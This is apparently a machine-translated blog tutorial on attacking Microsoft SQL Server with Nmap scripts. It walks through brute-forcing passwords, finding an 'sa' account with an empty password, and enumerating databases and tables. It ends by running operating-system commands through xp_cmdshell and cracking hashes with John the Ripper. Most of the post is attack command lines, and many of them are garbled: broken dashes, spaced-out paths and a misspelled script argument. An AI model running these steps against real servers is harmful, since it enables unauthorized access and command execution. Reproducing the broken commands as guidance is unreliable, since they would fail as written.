The Nmap Scripting Engine allows us to use Nmap in addition scanner port and as a complete platform penetrationse testing.
In this post we will deal with some techniques that we can apply in a network to check on Us.
Generally SQL databases play by default on 1433.
By opening nmap we can give the following command:
Nmap - p1433 -script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server & Hosting), the combination of nmap & Nmap Script Engine gives us information immediately about the SQL version, as well as the instance name.
In the nmap script engine there is ms-sql-brute that will check for passwords.
The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we do not find anything we can use some custom password list, the command will be if we consider that the file with the passwords is pass.txt .
nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt
At the same time, the nmap script engine enables us to find null passwords in infrastructures with Microsoft SQL server.
The order would be as follows
Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:
Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx
Then we will find the tables from the databases with the following command.
Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx
In oldnewer versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute commands of operating system commands through Nmap scripts such as.
Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx
At Continuity
Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx
Also we should say that we can use nmap & nmap script engine with other tools like john the ripper. With john the ripper we can extract the database password hashes to proceed to a password cracking.
We thank her warmly SecTeam @johnzontos.